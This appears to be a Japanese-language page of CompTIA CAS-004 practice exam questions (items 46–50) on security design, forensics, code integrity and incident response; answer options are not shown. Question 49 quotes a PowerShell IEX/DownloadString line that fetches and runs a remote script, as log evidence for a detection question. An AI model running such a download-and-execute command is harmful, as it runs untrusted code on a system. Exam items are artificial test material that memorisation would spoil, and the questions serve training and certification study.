CAS-004 試験問題 46

ある会社のセキュリティ エンジニアは、新製品で市場に先んじている競合他社による最近の挫折を軽減するためのシステムを設計しています。製品のいくつかには、エンジニアの会社が開発した独自の拡張機能が組み込まれています。ネットワークにはすでに SEIM と NIPS が含まれており、すべてのユーザー アクセスに 2FA が必要です。エンジニアは、関連するリスクを軽減するために、次のどのシステムを次に検討する必要がありますか?
  • CAS-004 試験問題 47

    フォレンジック対応でステガナリシス技術を使用する利点は次のどれですか?
  • CAS-004 試験問題 48

    開発者は、プログラムの各モジュールの整合性を維持し、不正なコード変更を検出するための制御を確実に実施したいと考えています。開発者が実行すべき最適な方法は、次のうちどれですか? (2 つ選択してください。)
  • CAS-004 試験問題 49

    セキュリティ アナリストは、外部向けメール サーバーへのログイン試行の失敗回数が着実に増加していることに気付きました。 ジャンプ ボックスの 1 つを調査しているときに、アナリストはログ ファイルで次のことを特定しました。
    powershell "IEX(New-Object Net.WebClient).DownloadString
    ('https://content.comptia.org/casp/whois.psl');whois"
    次のセキュリティ制御のうちどれが警告を発し、攻撃の次の段階を阻止できたでしょうか?
  • CAS-004 試験問題 50

    世界的な拠点を持つ地元の大学が、ウェブサイトと関連システムの全面的な改修に取り組んでいます。要件の一部は次のとおりです。
    * 顧客によるリソース需要の増加に対応する
    * 情報への迅速かつ容易なアクセスを提供する
    * 高品質のストリーミングメディアを提供する
    * ユーザーフレンドリーなインターフェースを作成する
    以下のアクションのうち、最初に実行する必要があるのはどれですか?